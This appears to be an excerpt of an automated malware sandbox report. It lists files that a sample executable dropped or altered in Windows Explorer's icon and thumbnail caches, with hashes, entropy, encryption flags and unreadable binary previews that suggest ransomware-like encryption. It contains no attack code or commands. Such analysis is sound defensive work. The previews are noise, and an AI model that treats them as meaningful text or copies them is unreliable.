                                                                                                                                      Preview:. ...\...Fy...{........B...X!...v`>G.6.. ......h[.8.>.K%...u..........6.)A4.....g.N......~....b.#..{S.... #.D2gA.*.~...J.....Qm.![........#...2...<mEO.....1R7Wo.*....#...R....@...[.....jJr..\ ..6.2.+<2....A.v .j4.+;N.'...\..b..r_............H....5n-.g|{.&...|...F.H.Z.0..?.>wt.UO......fR8..F}K..9)..a..(>...{.b..z.."......lZ..%..7*.f..b.ka.@...W.p..)....&5...}0U...h.....q........0... d..l.M...:w4.>&...(.K._;|.:...u.....>.....Jhy....x..(.u......t.......~..q.<I&......#r..#.w....@._...B...........zF..'.aE.!... .a...O..`....&..p...w.H2]s.i.\1..">..c..tJWV.<..gk..&..A$.hB%.T.....gy...qn....0.,........X9.Y .?.....b..).....%.....2.N.0..n.7......[......`9....e...,GR.h.'.Do...~i....9>?..{yX...A3.z.u.Ts=.!.:a)=B..4.D...G.d..a....t.k)vF51...~qp.."...,[kH.+....T....H...BG..q.p.a.;$.f..w+Q%R.'.RlO6......H:"..9....f.w[.....)...Q..3t..5.*&.."...<....Vk$.]HE|H.o.hl.}m..M..R...>.i....p{eP...{A...6.Z.%.w69;..u...H..@.........B9D...d/....)Bg..)#.5J|g

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24910
                                                                                                                                      Entropy (8bit):7.9923991793380225
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:epZmx7DfRTeXY1BN4YPbIvB3OkMt2z/JsJANsBqvrlJvmacQxVp2ma:eMRaoHbIFObtkJsJuTlJuacQB2ma
                                                                                                                                      MD5:D06BF0C9CA9EC88BFCEACE385D69D96B
                                                                                                                                      SHA1:11A389BA3C5CF24907F2528F21C4FF1289E5BF83
                                                                                                                                      SHA-256:6E147AADE9C389C515EEDB646A969B061E7C2778D15A54EC805B75D11AC51239
                                                                                                                                      SHA-512:76DD817F471D0C5BAAD7B77B43BEF908FC8C0FB3B7624A99ED0A91D1C018E28C9856D5FB081E2FCA1411FEA62CC1DB203C627BAACB1371B08EEEC1918AD5CFFA
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:. ....V.TGL."C_........xaZ...O.!.=......._%...[....n.`d.I..#..J...!}zG.}.M...St.=.+X.p=.K.b......J.K;b`.,."'..vb..96.....#.....q....>$QC.......i..8.Ri.....a,sL.s.......G.N.b.P.e...L...y........=L...k.....f..X.(.i.;... ..{).u.f8.{a......)......C...>+T.s.+!f~..J..V..b....~..,.$JR.........z..f......{..Q...xj..6.+.(..R.[....!..~..#..%P.je.....v.'q.M.....:...n..&U...).V.o6H.h.$...k.\.|v...m..%.`"...=Fp.h..o3.f...).............Vl(.rF..o..|.*|'..T.;.....".O.#E......<....%rG.[.0.........i2.<.|z..."B..4`......M.?......6..5w7S......h-@.....j.0..D..=~.G.XVY............~.LFL'......)D...Yx.l..$jI.._.L.0...T.<(......../.L.f={.$.j;..}vj..0..G.Q.r3'.*.gom\..b.fB.,....{..J.^......./.Q.....Q<.AT.n.xl........b\..qY.1.p.%I.Bq.3UR..ei....xy....R.{.^...Gi..l.J%..b.4*#j.A..z..&8D.......v...%g....~...6.q)...$YZ*.....3uQ...-.*p...u.`...c.f9~........'.......bw7.}.3..l......5xp....bNgK6...l5..d5....;P.z..i..D..~......j.G.....}....!\..uz.)Pr."7!.5o.G...g

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.228369646149024
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:SPxgdkqajx3QwE6m6MYzv1xeeXRvMKegNVRTlvV43ukIcii96Z:SWIMQRxxbviIRTlvVYukIcii9a
                                                                                                                                      MD5:0FCE5D2737E9D9D4F78C1C6546D691F9
                                                                                                                                      SHA1:D1EBADA5F9E42C55B6B89AFB4129BD5A75D6FA67
                                                                                                                                      SHA-256:BA1BD19EC1E3991AF89D302CA7C09454086DA75AAC95EEAD8C2A4DD9D63AD9DD
                                                                                                                                      SHA-512:C9F712749509C25764939CEC57543BC6FBCC4A418205172D143EA464091EDAE5E8CFE9A92A638E8FBB0867042A2F85808F02CDF217DDE1217FBAD800D0B67D4E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM y66..p.H.U.Q. ...i.p..^..3A...YK....F.n.9.....?.*G.d.Pn.yZ.;|.b....8PA.$..5.A...9@Y`..a..]..y....).W.......;.OX.%...=.^.......6DQ8...COD....t..h..#...X..#z}-n.A=.e,.6Tz...m.g.=..O....T.w......G/.e...DE.).2MV....S...V...)..J.K...J.1..3....|...,.X..N.s.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.150022712148512
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:w6nFL3KON8zEY7XF+1Upkij01wCwXa7VlnSxstUsz3uYRVSlih5w33ukIcii96Z:LxaXzEY7XIQkijv47VlnCsmS3XbS3uk6
                                                                                                                                      MD5:8FEFCD59BBA3D3151E817B2896B47CA6
                                                                                                                                      SHA1:C64D15C27D173893B648F7F0DA1532F49673998F
                                                                                                                                      SHA-256:5AB9218A8E7FB6D041D82C12002830BA3644AB3FEF7D56ABBA90BFE54F738555
                                                                                                                                      SHA-512:5F654D5A898DC16EDA041B26F53CCD09C4004ED686F1D6923853B261FD6A3221F33B168F7FF7406D15172E305E04E336F283F8AB188F4C68254137AD3B794222
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .$b9......{...$......O.Eu.n.,rcq4).....w..*G..$.yO.&-UR.N.+4.H&..{<8~.6..2..t."..rN......t6...9.6.,...... ....k..F....$.rx,.K..(..^..=.7t.3..r.q.|j|....g=...o.RO....h.....M.....H...QY..1.C.sCV|.../-.(..H...{...w.H$k...,Nv;..j..u...D7O*..?"Z.f...}6....:H1~9tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.242236790172329
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:GL1F+BfPqmBE1rAnSv9eWaq+K4QGFvUrUPe3r7oIzMi8VWck3ukIcii96Z:GLsPqmBSnvA008UP0Nv8GukIcii9a
                                                                                                                                      MD5:27341180ACA268B523DC529166813A8C
                                                                                                                                      SHA1:147C136719A78CF7A27E1E0C8E376C58E19331FA
                                                                                                                                      SHA-256:2ACE38907243024B6F35049DA7F4A23DF44A2AA6006DC975591F4BAA1979C720
                                                                                                                                      SHA-512:2102FE483DE87FD2EAD836DB05FCDE0095B5B5889D54F8B4DBD56B2ECFEC3AAD49AE0D674322285D8AFECF77C808CE3610816D35987A25BBA9B0A52827C38D2A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM `..&k....A.........!L...........47..X...vs.....>!....*...w).D9....i.u.T.r..OE..2.b.'.}..H>.z.d..B.4.f?D...[Lmit..o.N...q*yU......KVBq..U".Dpw. .1l.9Q...h_?...Z|...%~Gf.bo.I...... ...[..Qc........#<....4!..K...0A.1.O...$ ......Hk.V..p....$.E.D.p....Q.LW..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.302013579044555
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:xgR1Zwjj8qqcMMW6C3TzN592q5yLHIXxaHs9tdYisL133ukIcii96Z:wA8qqcMvPuIXxAo+icRukIcii9a
                                                                                                                                      MD5:64FEF305103D7EBFFE6B12547FF45A0B
                                                                                                                                      SHA1:36E6A6552F9ECE551C3F4D44B78EC3F459DD038C
                                                                                                                                      SHA-256:39EE07C58909352A68BEB6F2207D876A0CE084DC61FF140E079F5E42813E3812
                                                                                                                                      SHA-512:FB97CC40CA0CADD6D82E84E59204828F282572DB005F92023FD55CC7FBB0D8DBC08C10E591B8A89088C9853A3F33BB07F2C6A354179A62278139ABD27103A89E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM ..).?.!..c.U...F..|D.`L......u....sO....6.).[.."R..h.a^...m.7..'.d.p...\Q...........@.%Gs..h7.S....)..%...8....W.FeZ.b....g..:.-Y.5...%.........&M......T.GLt...j.>J.-r..+..H.|3.V...3U\V.....{...tO<..Bag.I....x....4...T.......1&...TG...e.^CB2.X.D...pn.....k..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.25013880532124
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:PXcFyn5vk58DxtTteWC/t9ENN9hb4G5lYchIP3ukIcii96Z:0ec5Sxh2l9EHv4G5lfhIPukIcii9a
                                                                                                                                      MD5:9679974D84B9A6564EE4675F740A0695
                                                                                                                                      SHA1:EA0AE05064F20C694EC2D3B059F25552918638F9
                                                                                                                                      SHA-256:825093AF409A6122D57CC5F516B7359ED1316F9CC75433CF06D2071A69253E58
                                                                                                                                      SHA-512:45967D5EC85293E20D9844B520E310608CC0D596853148C3CDCAA2FA3632D6634B2123FD9D11B8E329840B06BF500E08B6D71F8EB8F72DC2FF7997636892F1F7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM 3..........mD.uD...x.$...'9..j.D..>=......#...O.^./...F....w..9...%by.g.....&5.tq.$8...5.6...A...l6...-,#M.`S...\...>.Z..G...N..).....Z..f\....#]...C...3.6.2.W....`z...P).`..1'R..uHu2-d4.G2...hBhFE. 9,.G...^..f!t...~........z...>.........E.......bg+..h.}.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.322081587550238
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:ULGL5P2bbDiz0BlyALmga7QkdZr3FvNKDO1yKPYOeHoJ03ukIcii96Z:ULGNP2b+0uq8HzBvN2OYKsHoJcukIciD
                                                                                                                                      MD5:2C5AD0D94847FEF6E2B38F5C587ADCCF
                                                                                                                                      SHA1:63EDC3EFD28F97D5484747F3A96EB279514D78FF
                                                                                                                                      SHA-256:B4F3A1225244D603B69AA23656F2D5CCC9E69D5F1B2E6870CA797628CF12C6EE
                                                                                                                                      SHA-512:2378EFF2CA8F5BB22F139A9CF44DC0A6867B1720661E39C8AB8FB32ADF03B7E676CAC79267CCC83A73B2B442BDD00E41EDD6D199670CBE6915B03C3E35C87E5E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM Y..........su.u...&.;.\..._.e..'.P....+U ...D.*;..RN.A.j......c....=.....o.PjY..<.{.{.'(... P...I.lU.wR1...:hu:f.&..>f_......m......p+(.,.....r.7....X.+..x.I.x.;dF'....@..a..:..._..w.......T.1.YY....D&j.....c].SF..U..(|.a's{...7...d.e.9.F*^..8_!.M01.....]w.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.281840325101727
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:YjDM52fmd/FqZRli/p51fOE5hcnf/fFcKuZLV/g7K4vceM1U+3ukIcii96Z:YY2fgdQI51frO/fFcKGVY9vcr1hukIcq
                                                                                                                                      MD5:3F2CE8D7E953E75260CDD6DFA39FB378
                                                                                                                                      SHA1:B6BE7318AC3427C995324AFC3C7BA23FB6AC8319
                                                                                                                                      SHA-256:F4C99B0C8D14327926C4D13331C557BF4A27F680C56A16406E37B994A3204E42
                                                                                                                                      SHA-512:19BFB2771855744BB38D17466C85BDF7F226EC6497CD680831598CC8242200DB8CC6C31D7E57377AD02B2DDBD10F61650D561F0F97886E33A5929ED18A724AA5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .........,q..i\.V.9/..........[.3f.`...'y..X.1..T.$.....E>.1..j##.fsr...%...Cs.P.V.,....;}}.}D....>l"...[_.#a..s.}.&1.]W!\.a.._......O........2.M'.. .R...N.5......g...8..j.f..|...m..(.c}..d..........Zj...B.n..7r.J..<.>2?k...g..J.......p....G\V.}.*,+".4.yptp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.308294724506809
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:bCbYhw0EIPM9kXxHI3XuJxHjXZuOncJ16o1Xc8U33ukIcii96Z:yYq0xXxHQ+JxHjXZuOWsFnukIcii9a
                                                                                                                                      MD5:1D9EAFD00A1CDC9150B13B231CC7C26D
                                                                                                                                      SHA1:9524967BB613E905EB5E226AF4E7BE377A5C7D7A
                                                                                                                                      SHA-256:DA7D09D1DA5FFFDF99606EA3737F51F390C7798FA26AD421984611250848553E
                                                                                                                                      SHA-512:EE4FB6A5CE6156D38C10F779845570ACBC94D4B6B3FD69F13E7FEF76DDD4D121662E57088E28A5C18AB15280792772655B7C4671C12EB8D0160ED908D332667E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM ....Y..vt.; ...\.a.....qM...U...`...D@.Z..%].?.T..B..4......S#rr.T4..(.c..6(v..j.6...(.\.......O.2.......H..bG..xl.;.P.u........%vl..T.7:..T.y.4..G.,.A..~...o. .s......&.:....t..Rd...9*f~......=b.(...U!..1.|...6<. j....M.....C..8r.2.^. ...I..>...3......z3..+).r.gtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.308682896259373
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:yytm/9wkdUyp0XP3Mfjvp17i88g/UFvfDjniofZ32busUABPpXyH10v3ukIcii9a:yytm/9wWlafMF17iY/yDDjfZsr9piH2m
                                                                                                                                      MD5:2AB4C2E399FD8C10D888B71040CBEE90
                                                                                                                                      SHA1:7935FAB1D3D599721CF055BB7A70BDC9852ED241
                                                                                                                                      SHA-256:A0566D6FBF0A6A70B359A6928D45BFB16296B73FE89955B8D968DA4E79AA22C1
                                                                                                                                      SHA-512:B8CF78BA5322A31CDD8CD7CCB64D8335E961B27BA6EE7547C2DC8B254F86D139CB02E836402A10BA1704F614384ADA3D108FB52EE3AD3B19E1FA7C9692BEB33A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .f..c...u<EN..|.......<Vp.`..K...Z....\2.?..x.k...T)8n..1.M..p0...%.E..Z.D$.r..Q.Z.n.@..h. t..b.y.7..........&....\.C.....$....<....Ya....@.....s..MG.....1D...m\...%.S..]<.9.~...!......y.x..^-j.E5.D....s.....O..4..1\>.$.c.....J..(k(9.W#..........%...S....:..$..7tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.269297797180853
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:pU12s/E7LZocfGq2QXOGorxbPYahbjTU2HPnEJO/F8XSHzCmiW9u3ukIcii96Z:W5kfGq2QXOnPPbUQ/4AF8E9+ukIcii9a
                                                                                                                                      MD5:C684AACBDF9F1E3455D06C4D03EC0288
                                                                                                                                      SHA1:3E699A82006150B6F4BA44932DDE7C0DD0F45B23
                                                                                                                                      SHA-256:E94A43E694C90A65992B9C86C7C62CA28D6AD3C4055A0BEC71C8527C153A8921
                                                                                                                                      SHA-512:5352950AF7EDA6E62354F0A7A6980EA8A412FCC7D2897B45A94D98AD2E147FB9ADB96C6E289E40B4A4353E92B79A85CA9615B98F606889DB15554DE2F2764325
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .Kkm..yh..g.4t...&.J..pH.........!.l..z...,L0x...G+.J"}...2.Rq...)....Z..H2.....Ms..VC..Z.".2.Pe...]...V...?...I.BY.<VRT......x..j@.e{....3.f..zuma2....i...z.h.t.++..B[.K.)....Q.....n.\Z......[h..gaQA.Qx...[.R#q.,.4R.2...g..i....I...0~'Om....sK..>.2.e...D.Y.[..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.284397639138251
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:Ua/I7jvgSSrv91JS/ZNavohpvF2Enmii68/Lc5lenbftTbT8aGH8P3ukIcii96Z:U57crv787X4Pp6k4le7F8LHYukIcii9a
                                                                                                                                      MD5:AAC7C02C6D1A4F969DB47C63CAB2823A
                                                                                                                                      SHA1:7B1630C16BD5D82881289EB0C4F3A220F84B7C60
                                                                                                                                      SHA-256:A85DA1AF2A63883115F0878177155CEE0293E6261A5C7C24E59D3377514BF0F8
                                                                                                                                      SHA-512:A59E0BCA96CC2B782B3263C4160D7CB372F6B72AA3687B0E40FF9877614CE6BA370A3C81D5749B5922D8DFE58B4A909134043CFE892F5B3D20E01A3E3F04332C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .q...imW*.~..y...I|/.eZ.Z`...)3.a.v.....=...T..7..Q.}....b>...%.Y..lm..y._..........b....\..f.&#m....$KG.mL..%....Uy...M.g.!..W........1^.*3...C]:`^...O=...$>q)}....I..9.....T..Kh....M......]...>K..@.~;...w^.h.b/.U....5@..G.o........].^...a...&?.#...@.....LM.-.U.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.283560777656885
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:98Ct0syMQ6NeDcpXTotj6NPikrHIt1NzXdh2QaMXc8RuVnggm43ukIcii96Z:98Ct0sybUGp65ikro3NLH20+VnlmYuk6
                                                                                                                                      MD5:7E0DB6C09F21DCD517704834208796FE
                                                                                                                                      SHA1:DADBBB1AB5953018EF6F2DB26F0BFFC87F68C081
                                                                                                                                      SHA-256:44706A07C362416B6F2C68176E74D6B62E74B45F7DFD966B62678710AAC58131
                                                                                                                                      SHA-512:F23C11950FABD9923E2A85D17CF0C44A20193285A864058D1592BC84F42018DA94878CA37E9932CF75B6EAA900773B241477ED84CE22E6512DAE18010A547174
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .D.P.*....0.;....o........Fk9a.e.U;.N...k..,....U.......%.s*....l70...v8....l3.;.Ci.9..r.Q<^.{......V...B.E.........E.a...?U..(....z..o.zL......K.\./h;..OA.7A...3../1..O.w%.._Zt.eH...V.3.9@x"*1...QuzI*T.._.l..<v_...>.a..P.y.y"....2MM.}...-...."R..t..#..p..E...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.333884834726726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:9stRrHh2r/Wat4R/jru24/GIsf4Fjm4FWfVwevx7aRoJT3UPpog7zj43ukIcii9a:GYTWa6R/jru2yGIsf4FjmVwux7tT3Wpd
                                                                                                                                      MD5:419FDB6827FF502365AE0A8C1BEFC328
                                                                                                                                      SHA1:A39D682E790AEF71D227F49333BC5549F3974040
                                                                                                                                      SHA-256:769EC25BFE2783112843946055AA0BFF78B223735105DEA1381B9BC5018165EC
                                                                                                                                      SHA-512:67BA498FB584935218C9EF9B0AE40C314C6867A8A2D6C2A624761A1F512E3E83EAB5B6046F1CBF6409B2AC3286C16D1563A2381F763A5EEB1777EAE92B61DF6C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .Y...w'.....Q.H.G..~..y.`;.crY...4.Q.....+..Y...q..#......)[Gw"..V...?O.)...0l;...+..j1...0...k.W.vo...%........P.....r;........._Z11~XC.-.....U.V.........10.\ r....H...".+.f....,}.=..2Y.Z....3....%...U...^.j.l.O. ..X......;..Nw.$...N.......<~..._.B`.i..O.>.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.250158107209864
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:xwCi9m1Y5tGeYWVeyhvtV5UB90T9uBNameoawvbcFwO6qpKsWeBRV83ukIcii96Z:lkmeYW0ylt/UzqMBkLop4eOBp1YukIcq
                                                                                                                                      MD5:85ED34E76BCAC901D1F4E308402F1824
                                                                                                                                      SHA1:5BD6F7D6C7A91119596246479EBC91B82B3E6CA7
                                                                                                                                      SHA-256:30CD0B0F9ED34886D1E8B71FDBB5F14D162923B8AD21F1F59FD322E3987CA10F
                                                                                                                                      SHA-512:2230EF93BEC7E885C55B1D05B6E43E317493E82269E0B490E69A2F1A0BEA0B7BB3EE959C0560AC74C793E57D612D5A9E2DBF60BCE1772BF6EDD97FCF4CD441D7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM .m..'.....a[....:.g1).....~.u..wv"...I..$..p.....q#..^{..$H.E.p.}?..s..y.......,...7....P...&r.:..."_.....n...Q......H.a./.j.8.S..Qv]...t...(a.K4..a..9..c..9...:..ds.G06[...a..$.<...f.N#.<t6 hcH9.j6....`....x.q./.y ..\.t....i.X....!...nl6.&^w;}..*R`3..C..T{@[...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):4.326840977839256
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:/utdaVnFNVQ2I8wHXJH9KPauPgnr/GTvYImqrYEz7xiFmi6xV:WTSnFNV+FH9KyuPMr/oeqrYEz7xii
                                                                                                                                      MD5:CA8D41655B93729E4742C23B578C45A6
                                                                                                                                      SHA1:BBEFBF20BC9B6B5F602C130FB891FE458E985E75
                                                                                                                                      SHA-256:0091C8455D077AF19A7C953AA83F70A7A9C33838B927B208C0B54B4117B42D69
                                                                                                                                      SHA-512:389F5525EA42C03DC242648E1457FAF01FBB9FB5D5DB088A5B51D0A18CA0D2344F2BED0F4A35B6CC213AB52312EC734F504B66385F61C435AF62AE90164D5B19
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CMMM ..P..~.....e.v @.Sk.fD.E.......zB5..Q.Y_.-.nei..........Q...D.#.......z.B....dV.=..w^..x..K.S .l..g.E.m.G.....&\T.S........92.#:.k..g6e..:.Y..(...J1.S.t6b.._K.l.v...O.7.\,.%.....X..U.....A.Rk.PP8.di..x...K.b.>.[..d.}.f.0F...5.nS....C...:qh64......X..N.)4......>|.........$...6? .SI......m..[.Z-`."...[. ..zVZNh.6..8...c..}...F....}!.....?q..+....e.N.H...U..e..m~....l9..]$\SU....G...E..c.Kou..u.N.)T.O..7.A.H]}..P..,\.^u...o.~.d......>.?......y..v.o.u&>..l..(.[.t...!EMm..(....3..4...:Y=.....$.:.!ca,":.p..[fAr..{....`.|.,.0..QW.`.A.@.5w....o....[...v..dp.#......N.Z.3.C..7...!hJ....>..@fN.'-z...H..hMj.|..8.e..anu&..=!/t.oZ.....,F{..%P..M.#..n........>h..!>...t)...%...E"A{..i.[e............3..=..y..C.~..Aj...aV..f?..vj6]..;..I.A...\....D..?~Q.e..@.$l...+LN.V.ghc.0.8.r..Y.oG.G..9.[s.3.S.p..>@....o.Y......FR....a...3.B..Q..p......cpy.....s;#...o...3....oP.}.._o!.)v,.m.2......k...<k.R. .dk..`...^..5|..6.oY@W.W.O.H..K.D+)c..4t.....i..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_custom_stream.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.305349238717724
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:Hh7mxY3lmkKzj8bFzSK7FkTzYXCkcvEpYjcPBs6jS48HZgXpPyP3ukIcii96Z:UxsmkK38dSgyzOcJoJDjS485SpiukIcq
                                                                                                                                      MD5:FA575339FA078432E1E54F0BAF0B0E9D
                                                                                                                                      SHA1:7EEC0622E5A9E0E09602DFC2B6917DB0EC763D81
                                                                                                                                      SHA-256:0EB67A79E95D76125CF42D81F8E36ED52A64E494D7B5A18B2157C201A78E87F9
                                                                                                                                      SHA-512:ECD35277090CB221341623C209ACD877BE0E8DE70DA3B8E4DACBC8E40FB388BAED815DEDA7C9DE8FC346DE35BD5ABEFC6E92A66118F3B4C4904BCE1CB0185CC5
                                                                                                                                      Malicious:false
